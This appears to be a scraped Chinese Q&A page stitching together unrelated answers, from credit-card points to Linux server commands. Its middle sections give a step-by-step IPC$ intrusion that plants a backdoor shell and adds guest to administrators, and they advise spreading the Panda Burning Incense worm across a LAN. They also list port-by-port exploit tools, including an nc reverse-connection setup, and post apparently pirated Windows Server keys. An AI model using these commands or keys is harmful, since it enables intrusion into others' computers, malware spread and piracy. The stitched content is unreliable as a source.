⑴ 中信銀行信用卡的積分怎麼使用
1、積分禮品兌換僅限主卡持卡人提出,同一持卡人名下的不同中信信用卡積分可以在兌換時合並使用,系統將按持卡人提供的卡片順序扣除積分。不同持卡人名下的積分不能合並使用。
2、持卡人可使用「積分」或「積分+自付金額」的方式兌換禮品,若客戶選擇「積分+自付金額」的方式的,僅能使用持卡人申請時提交的中信信用卡作為支付工具。信用卡額度不足時,系統將自動取消兌換申請。
3、持卡人只能為自己名下的主卡或附屬卡提出積分兌換年費的申請,不能為其他卡片提出兌換年費的申請,年費兌換每卡每年僅限申請一次。且年費兌換期限為第一年年費產生後的次年年費開始,第一年年費不得使用積分兌換。請務必在年費賬單產生後向卡中心提出積分兌換年費申請。
4、持卡人兌換的航空公司飛行里程/飛行積點的使用方法請參照並遵守各航空公司公布的服務條款與細則。
⑵ 區域網內如何將病毒傳到其他電腦.
1.在網吧最好用139埠入侵
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
2.在家,要看人家有沒有裝arp防火牆如果沒裝,最直接的就是熊貓燒香,下載一個熊貓燒香樣本,之後讓自己的電腦感染上,之後他就會在整個區域網傳染。
⑶ 有文件後面帶SRV後綴,是什麼意思
親測這是Ramnit.b蠕蟲病毒,我之前也被這個病毒惡心到了。這個病毒的原理簡單的說就是,打開了一個帶有這個病毒的文件,他就會在C盤的一個Microsoft文件夾里偽裝成系統文件,以後你每打開一個EXE文件,他會自動生成一個同樣名字的病毒(比如1.EXE,就會生成1Srv.EXE),這種情況,你只能用殺毒軟體全盤殺毒,當時我不知道,以為是電腦出問題了沒上心,過了1年多,有網友告訴我是病毒,我用殺毒軟體一查,8萬多文件被感染,總共將近1T的文件被迫刪除,問題解決,幸運的是中毒的全是游戲而不是能泄露隱私的文件。純手打並親自試過,求贊同
⑷ 哪些埠可以用哪些漏洞入侵~懸賞100~回答的好且詳細追加100
希望對新手入侵有幫助!
1. 1433埠入侵
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899埠入侵
用4899過濾器.exe,掃描空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行注入。(啊D的注入軟體)。
5. serv-u入侵(21埠)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升許可權。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
6. 554埠
用real554.exe入侵。
7. 6129埠
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445埠,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出入侵。
9. 3127等埠
可以利用doom病毒開的埠,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟體入侵(WINNTAutoAttack.exe)。
經典IPC$入侵
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連
接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名
,輸入administrators,命令即可成功完成。
2. C:\> srv.exe $">\\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的
c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊.
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備
開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的
是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打
算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這
個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使
用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作
一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我
們可以用guest再次訪問這台計算機)
⑸ cn_win_srv_2003_r2_standard_x64_with_sp2_cd1_X13-28810 的序號
RYCR6-T7Y6M-2TVHK-C2YW3-7TYQ8,MR78C-GF2CY-KC864-DTG74-VMT73附其他2003版本序列號。未驗證。
物品簡介:序列號就是軟體開發商給軟體的一個識別碼,和人的身份證號碼類似,其作用主要是為了防止自己的軟體被用戶盜用。用戶要使用其軟體就必須知道序列號。在用戶注冊或購買產品時生成唯一的識別碼,一般稱作機器碼,也叫認證碼、注冊申請碼等。
一般用途:
序列號在信息技術大量運用、物聯網初步成型的時期用於電子設備身份識別。為了識別的准確性,序列號都為全球唯一的號碼。
早在20世紀,序列號就已用於系統軟體的防偽、激活等操作。
而在行動電話(手機)大規模普及的時代,一部手機往往有至少1個序列號。
⑹ 如何查詢伺服器vmware 版本
linux下看配置,可沒有windows那麼直觀。你只能一個一個查看。
一:cpu[root@srv /]# more /proc/cpuinfo | grep "modelname"
[root@srv /]# grep "model name"/proc/cpuinfo
二:內存[root@srv /]# grep MemTotal /proc/meminfo
三:查看CPU位數(32 or 64)[root@srv /]# getconf LONG_BIT32四:查看linux版本[root@srv /]# more /etc/redhat-releaseCentOSrelease 5 (Final)[root@srv /]# more /etc/issueCentOS release 5 (Final)Kernel \r on an \m
五:查看內核版本[root@srv /]# uname-r2.6.18-92.1.18.el5.028stab060.2PAE[root@srv /]# uname -aLinux srv.eddiechen.cn2.6.18-92.1.18.el5.028stab060.2PAE #1 SMP Tue Jan 13 12:31:30 MSK2009 i686 i686 i386 GNU/Linux六:查看時區[root@srv /]# date -RWed, 25 Feb 200902:20:50 +0000[root@srv /]# mv /etc/localtime/etc/localtime.save[root@srv /]# cp /usr/share/zoneinfo/Asia/Shanghai/etc/localtime[root@srv /]# date -RWed, 25 Feb 200910:24:26 +0800七:主機名[root@srv /]# hostnamesrv.eddiechen.cn八:查看selinux情況[root@srv /]# sestatusSELinuxstatus:
disabled九:網路IP[root@srv /]# ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'207.154.202.216網關[root@srv /]# cat /etc/sysconfig/networkNETWORKING="yes"GATEWAY="192.0.2.1"HOSTNAME="srv.eddiechen.cn"dns[root@srv /]# cat /etc/resolv.confnameserver208.74.168.131nameserver 208.74.168.132nameserver 4.2.2.1十:已經安裝的軟體包[root@srv /]# rpm -qa | wc -l197[root@srv /]# yum list installed | wc-l198十一:磁碟和分區[root@srv /]# df-hFilesystem Size Used AvailUse % Mountedon/dev/simfs 10G 353M 9.7G 4% /[root@srv /]# -sh353M[root@srv /]# /etc-sh4.6M /etc